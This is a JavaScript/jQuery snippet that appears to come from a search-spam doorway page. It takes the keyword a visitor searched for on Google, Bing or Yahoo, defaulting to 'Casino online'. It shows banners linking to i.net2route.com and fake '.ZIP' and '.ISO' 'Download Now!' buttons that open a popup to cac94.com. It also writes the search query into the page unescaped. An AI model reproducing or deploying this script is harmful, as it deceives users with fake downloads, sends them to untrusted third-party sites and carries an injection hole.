var dom = 'http://i.net2route.com';var format = 'width="618" height="124"';var imgstyle = 'back1';
var r=document.referrer,t="",q
if(r.indexOf("google.")!=-1)t="q";if(r.indexOf("bing.")!=-1)t="q";if(r.indexOf("yahoo.")!=-1)t="p"
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)){
var kq1=r.substring(q+2+t.length).split("&")[0]
kq1 = decodeURIComponent(kq1.replace(/\+/g, '%20'));
}else{var kq1="Casino+online";}	
$().ready(function(){$("#KW1").empty();
$('<div id="zip" style="cursor: pointer; padding:10px 10px 10px 35px; font-size: 1.2em;><span style="font:bold;">' + kq1 + ' -> <span style="font:bold;font-size: 0.8em;color: red;">Five best offer</span></span></div><br />').fadeIn(1250).appendTo('#KW1');
$('<a href="' + dom + '/link/' + kq1 + '/1.html" target="_blank"><img border="0" ' + format + ' src="' + dom + '/img/' + kq1 + '/1_' + imgstyle + '.png" /></a><br /><a href="' + dom + '/link/' + kq1 + '/2.html" target="_blank"><img border="0" ' + format + ' src="' + dom + '/img/' + kq1 + '/2_' + imgstyle + '.png" /></a><br /><a href="' + dom + '/link/' + kq1 + '/3.html" target="_blank"><img border="0" ' + format + ' src="' + dom + '/img/' + kq1 + '/3_' + imgstyle + '.png" /></a><br /><a href="' + dom + '/link/' + kq1 + '/4.html" target="_blank"><img border="0" ' + format + ' src="' + dom + '/img/' + kq1 + '/4_' + imgstyle + '.png" /></a><br /><a href="' + dom + '/link/' + kq1 + '/5.html" target="_blank"><img border="0" ' + format + ' src="' + dom + '/img/' + kq1 + '/5_' + imgstyle + '.png" /></a><br />').appendTo('#KW1');
$('<div id="zip" style="cursor: pointer; background:url(images/zip.png) no-repeat scroll left center; padding:10px 10px 10px 35px; font-size: 1.2em;><span style="font:bold;">' + kq1 + '.ZIP <span style="font-size: 0.5em;color: red;">Download Now!</span></span></div><br />').fadeIn(1250).appendTo('#KW1');
$('<div id="zip" style="cursor: pointer; background:url(images/iso.png) no-repeat scroll left center; padding:10px 10px 10px 35px; font-size: 1.2em;><span style="font:bold;">' + kq1 + '.ISO <span style="font-size: 0.5em;color: red;">Download Now!</span></span></div><br />').fadeIn(1200).appendTo('#KW1');
$('#zip').live('click', clickHandler);
function clickHandler() {window.open("http://cac94.com/res/1/");window.focus();return false;}});